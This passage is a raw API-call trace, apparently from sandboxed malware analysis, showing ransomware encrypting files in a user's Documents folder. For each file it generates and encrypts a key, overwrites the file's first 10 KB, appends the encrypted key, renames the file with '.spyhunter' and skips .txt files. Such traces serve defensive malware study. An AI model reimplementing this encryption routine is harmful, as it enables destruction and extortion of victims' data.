[0148.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef58 | out: pbBuffer=0x248ef58) returned 1 [0148.537] GetProcessHeap () returned 0x2c0000 [0148.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef50*=0x30) returned 1 [0148.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\zg3fMB6V qr4croDm.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\zg3fmb6v qr4crodm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\zg3fMB6V qr4croDm.xlsx") returned 87 [0148.538] StrStrW (lpFirst="zg3fMB6V qr4croDm.xlsx", lpSrch=".txt") returned 0x0 [0148.538] GetProcessHeap () returned 0x2c0000 [0148.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.538] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef14*=0x2800, lpOverlapped=0x0) returned 1 [0148.539] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.539] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef14*=0x2800, lpOverlapped=0x0) returned 1 [0148.539] GetProcessHeap () returned 0x2c0000 [0148.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.539] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.539] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef14, lpOverlapped=0x0 | out: lpBuffer=0x248ef54*, lpNumberOfBytesWritten=0x248ef14*=0x4, lpOverlapped=0x0) returned 1 [0148.539] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef14*=0x30, lpOverlapped=0x0) returned 1 [0148.539] CloseHandle (hObject=0x9c) returned 1 [0148.539] GetProcessHeap () returned 0x2c0000 [0148.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.540] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\zg3fMB6V qr4croDm.xlsx.spyhunter") returned 97 [0148.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\zg3fMB6V qr4croDm.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\zg3fmb6v qr4crodm.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\zg3fMB6V qr4croDm.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\zg3fmb6v qr4crodm.xlsx.spyhunter")) returned 1 [0148.541] GetProcessHeap () returned 0x2c0000 [0148.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.541] GetProcessHeap () returned 0x2c0000 [0148.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.541] GetProcessHeap () returned 0x2c0000 [0148.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39ec0 | out: hHeap=0x2c0000) returned 1 [0148.541] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef50 | out: pbBuffer=0x248ef50) returned 1 [0148.541] GetProcessHeap () returned 0x2c0000 [0148.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef48*=0x30) returned 1 [0148.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\yrCn0.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\yrcn0.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.541] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\yrCn0.ots") returned 74 [0148.541] StrStrW (lpFirst="yrCn0.ots", lpSrch=".txt") returned 0x0 [0148.541] GetProcessHeap () returned 0x2c0000 [0148.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.542] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0148.542] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.542] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0148.542] GetProcessHeap () returned 0x2c0000 [0148.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.543] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.543] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x248ef4c*, lpNumberOfBytesWritten=0x248ef0c*=0x4, lpOverlapped=0x0) returned 1 [0148.543] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef0c*=0x30, lpOverlapped=0x0) returned 1 [0148.543] CloseHandle (hObject=0x9c) returned 1 [0148.543] GetProcessHeap () returned 0x2c0000 [0148.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.543] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\yrCn0.ots.spyhunter") returned 84 [0148.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\yrCn0.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\yrcn0.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\yrCn0.ots.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\yrcn0.ots.spyhunter")) returned 1 [0148.544] GetProcessHeap () returned 0x2c0000 [0148.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.544] GetProcessHeap () returned 0x2c0000 [0148.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.544] GetProcessHeap () returned 0x2c0000 [0148.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4e78 | out: hHeap=0x2c0000) returned 1 [0148.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef50 | out: pbBuffer=0x248ef50) returned 1 [0148.544] GetProcessHeap () returned 0x2c0000 [0148.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef48*=0x30) returned 1 [0148.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\p -w4z8VS.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\p -w4z8vs.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\p -w4z8VS.pps") returned 78 [0148.544] StrStrW (lpFirst="p -w4z8VS.pps", lpSrch=".txt") returned 0x0 [0148.545] GetProcessHeap () returned 0x2c0000 [0148.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.545] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0148.545] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.546] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0148.546] GetProcessHeap () returned 0x2c0000 [0148.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.546] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.546] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x248ef4c*, lpNumberOfBytesWritten=0x248ef0c*=0x4, lpOverlapped=0x0) returned 1 [0148.546] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef0c*=0x30, lpOverlapped=0x0) returned 1 [0148.546] CloseHandle (hObject=0x9c) returned 1 [0148.546] GetProcessHeap () returned 0x2c0000 [0148.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.546] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\p -w4z8VS.pps.spyhunter") returned 88 [0148.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\p -w4z8VS.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\p -w4z8vs.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\p -w4z8VS.pps.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\p -w4z8vs.pps.spyhunter")) returned 1 [0148.547] GetProcessHeap () returned 0x2c0000 [0148.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.547] GetProcessHeap () returned 0x2c0000 [0148.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.547] GetProcessHeap () returned 0x2c0000 [0148.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f048 | out: hHeap=0x2c0000) returned 1 [0148.547] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef48 | out: pbBuffer=0x248ef48) returned 1 [0148.547] GetProcessHeap () returned 0x2c0000 [0148.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.547] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef40*=0x30) returned 1 [0148.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\NS3t8b4BmSGG.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\ns3t8b4bmsgg.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\NS3t8b4BmSGG.pps") returned 81 [0148.548] StrStrW (lpFirst="NS3t8b4BmSGG.pps", lpSrch=".txt") returned 0x0 [0148.548] GetProcessHeap () returned 0x2c0000 [0148.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.548] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef04*=0x2800, lpOverlapped=0x0) returned 1 [0148.549] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.549] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef04*=0x2800, lpOverlapped=0x0) returned 1 [0148.549] GetProcessHeap () returned 0x2c0000 [0148.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.549] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.549] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x248ef44*, lpNumberOfBytesWritten=0x248ef04*=0x4, lpOverlapped=0x0) returned 1 [0148.549] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef04*=0x30, lpOverlapped=0x0) returned 1 [0148.549] CloseHandle (hObject=0x9c) returned 1 [0148.549] GetProcessHeap () returned 0x2c0000 [0148.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.549] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\NS3t8b4BmSGG.pps.spyhunter") returned 91 [0148.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\NS3t8b4BmSGG.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\ns3t8b4bmsgg.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\NS3t8b4BmSGG.pps.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\ns3t8b4bmsgg.pps.spyhunter")) returned 1 [0148.550] GetProcessHeap () returned 0x2c0000 [0148.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.550] GetProcessHeap () returned 0x2c0000 [0148.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.550] GetProcessHeap () returned 0x2c0000 [0148.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63c78 | out: hHeap=0x2c0000) returned 1 [0148.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef48 | out: pbBuffer=0x248ef48) returned 1 [0148.550] GetProcessHeap () returned 0x2c0000 [0148.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef40*=0x30) returned 1 [0148.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\F-g-e2IHXFLr.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f-g-e2ihxflr.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\F-g-e2IHXFLr.ods") returned 81 [0148.551] StrStrW (lpFirst="F-g-e2IHXFLr.ods", lpSrch=".txt") returned 0x0 [0148.551] GetProcessHeap () returned 0x2c0000 [0148.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.551] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef04*=0x2800, lpOverlapped=0x0) returned 1 [0148.551] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.552] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef04*=0x2800, lpOverlapped=0x0) returned 1 [0148.552] GetProcessHeap () returned 0x2c0000 [0148.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.552] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.552] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x248ef44*, lpNumberOfBytesWritten=0x248ef04*=0x4, lpOverlapped=0x0) returned 1 [0148.552] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef04*=0x30, lpOverlapped=0x0) returned 1 [0148.552] CloseHandle (hObject=0x9c) returned 1 [0148.552] GetProcessHeap () returned 0x2c0000 [0148.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.552] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\F-g-e2IHXFLr.ods.spyhunter") returned 91 [0148.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\F-g-e2IHXFLr.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f-g-e2ihxflr.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\F-g-e2IHXFLr.ods.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f-g-e2ihxflr.ods.spyhunter")) returned 1 [0148.553] GetProcessHeap () returned 0x2c0000 [0148.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.553] GetProcessHeap () returned 0x2c0000 [0148.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.553] GetProcessHeap () returned 0x2c0000 [0148.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63b88 | out: hHeap=0x2c0000) returned 1 [0148.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef40 | out: pbBuffer=0x248ef40) returned 1 [0148.553] GetProcessHeap () returned 0x2c0000 [0148.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef38*=0x30) returned 1 [0148.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\f xdryfPJB30MhS2 8t.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f xdryfpjb30mhs2 8t.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.554] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\f xdryfPJB30MhS2 8t.odp") returned 88 [0148.554] StrStrW (lpFirst="f xdryfPJB30MhS2 8t.odp", lpSrch=".txt") returned 0x0 [0148.554] GetProcessHeap () returned 0x2c0000 [0148.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.554] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eefc*=0x2800, lpOverlapped=0x0) returned 1 [0148.554] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.555] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eefc*=0x2800, lpOverlapped=0x0) returned 1 [0148.555] GetProcessHeap () returned 0x2c0000 [0148.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.555] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.555] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x248ef3c*, lpNumberOfBytesWritten=0x248eefc*=0x4, lpOverlapped=0x0) returned 1 [0148.555] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eefc*=0x30, lpOverlapped=0x0) returned 1 [0148.555] CloseHandle (hObject=0x9c) returned 1 [0148.555] GetProcessHeap () returned 0x2c0000 [0148.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.555] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\f xdryfPJB30MhS2 8t.odp.spyhunter") returned 98 [0148.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\f xdryfPJB30MhS2 8t.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f xdryfpjb30mhs2 8t.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\f xdryfPJB30MhS2 8t.odp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\f xdryfpjb30mhs2 8t.odp.spyhunter")) returned 1 [0148.572] GetProcessHeap () returned 0x2c0000 [0148.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.572] GetProcessHeap () returned 0x2c0000 